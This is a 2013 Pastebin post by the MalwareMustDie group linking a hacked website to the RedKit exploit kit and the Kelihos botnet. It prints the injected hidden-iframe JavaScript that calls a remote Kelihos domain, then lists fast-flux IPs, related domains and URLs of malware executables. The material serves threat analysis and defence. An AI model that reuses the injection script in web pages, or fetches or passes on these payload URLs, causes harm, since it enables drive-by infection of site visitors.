API tools faq
paste
Advertisement
MalwareMustDie

#MalwareMustDie - #PoC of HOW Kelihos Infecting via RedKit

MalwareMustDie
Nov 5th, 2013
1,779
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.72 KB | None | 0 0
raw download clone embed print report
  1. // #MalwareMustDie!
  2. // Relation between Hacked Sites, RedKit EK and -
  3. // Kelihos infection - a PoC
  4.  
  5. // Infector : a hacked site:
  6.  
  7. h00p://midinette.co.jp/
  8.  
  9. // Injected script with long white space trails..:
  10.  
  11. </table><!--6b1ee4-->
  12. <script type="text/javascript" language="javascript" >
  13. (function () { var tu = document.createElement('iframe');
  14. tu.src = 'h00p://vezylgys.ru/count10.php'; <========================
  15. tu.style.position = 'absolute';
  16. tu.style.border = '0';
  17. tu.style.height = '1px';
  18. tu.style.width = '1px';
  19. tu.style.left = '1px';
  20. tu.style.top = '1px';
  21. if (!document.getElementById('tu')) {
  22. document.write('<div id=\'tu\'></div>');
  23. document.getElementById('tu').appendChild(tu); }})();
  24. </script><!--/6b1ee4-->
  25.  
  26. // The domains is the KELIHOS payload domains:
  27.  
  28. "vezylgys.ru"
  29.  
  30. // Trailing infector URL:
  31.  
  32. --2013-11-05 15:22:25-- h00p://vezylgys.ru/count10.php
  33. Resolving vezylgys.ru (vezylgys.ru)...
  34. failed: hostname nor servname provided, or not known.
  35. unable to resolve host address 'vezylgys.ru'
  36.  
  37. // IP Addresses used were fast flux:
  38.  
  39. 2012-12-01 106.1.203.42
  40. 2013-04-17 109.251.176.16
  41. 2013-04-22 178.151.148.83
  42. 2012-12-01 178.158.182.164
  43. 2012-12-01 37.229.37.16
  44. 2012-12-01 46.118.41.236
  45. 2012-12-01 46.119.245.121
  46. 2012-12-01 93.79.247.98
  47.  
  48. // If we picked one of the address.. the rest of Kelihos domains will apears..
  49.  
  50. 178.151.148.83 IP address information
  51.  
  52. 2013-05-18 cylylwib.ru
  53. 2013-04-29 hg9lditg.ojmeqkuq.ru
  54. 2013-08-11 nyzveuc.com
  55. 2013-06-28 peabtaka.ru
  56. 2013-07-16 tofhermi.ru
  57. 2013-06-28 utykixep.ru
  58. 2013-04-22 vezylgys.ru
  59.  
  60.  
  61. // Let's check the payloads records on that IP:
  62.  
  63. 2/39 2013-08-14 11:07:55 h00p://178.151.148.83/rasta02.exe
  64. 1/39 2013-07-21 17:16:16 h00p://178.151.148.83/file.htm
  65. 4/39 2013-07-16 15:53:11 h00p://tofhermi.ru/rasta01.exe
  66. 1/38 2013-07-14 11:44:41 h00p://178.151.148.83/index.htm
  67. 1/39 2013-07-14 11:44:41 h00p://178.151.148.83/main.htm
  68. 1/38 2013-07-12 08:12:36 h00p://178.151.148.83/login.htm
  69. 5/39 2013-06-28 09:19:56 h00p://utykixep.ru/goodtr1.exe
  70. 4/39 2013-06-28 09:20:02 h00p://peabtaka.ru/b0ber01.exe
  71. 2/39 2013-05-17 18:19:56 h00p://178.151.148.83/welcome.htm
  72. 1/39 2013-05-13 19:12:45 h00p://178.151.148.83/setup.htm
  73. 3/35 2013-04-29 04:38:11 h00p://hg9lditg.ojmeqkuq.ru/calc.exe
  74. 5/36 2013-04-22 16:14:05 h00p://vezylgys.ru/
  75.  
  76. //Well, all of the data above are either Kelihos or RedKit EK URL.
  77.  
  78. // Now we have PoC relation between :
  79.  
  80. This infected site, count**.php redirection, to the same infrastructure as the Kelihos botnet.
  81.  
  82. Kelihos spread themself into the hacked sites that they injected with the infector script,
  83. which likely to be forwarded to exploitation to infect the payload.
  84.  
  85. ---
  86. #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!